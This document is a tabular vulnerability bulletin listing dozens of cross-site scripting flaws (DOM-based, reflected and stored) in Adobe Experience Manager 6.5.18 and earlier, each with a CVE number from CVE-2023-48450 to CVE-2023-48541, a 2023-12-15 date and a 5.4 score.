adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48450 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48451 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48452 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48453 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48454 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48455 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48456 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48457 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48458 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48459 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48460 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48461 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48462 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48463 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48464 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48465 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48466 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48467 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48468 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48469 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48470 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48471 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48472 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48473 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48474 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48475 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48476 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48477 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48478 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48479 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48480 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48481 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48482 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48483 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48484 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48485 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48486 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48487 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48488 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48489 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48490 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48491 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48492 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48493 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48494 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48495 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48496 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48497 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48498 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48499 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48500 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48501 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48502 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48503 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48504 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48505 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48506 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48507 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48508 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48509 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48510 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48511 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48512 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48513 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48514 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48515 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48516 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48517 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48518 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48519 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48520 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48521 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48522 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48523 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48524 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48525 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48526 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48527 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48528 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48529 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48530 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48531 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48532 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48533 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48534 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48535 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48536 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48537 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48538 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48539 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48540 psirt@adobe.com |
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48541 psirt@adobe.com |
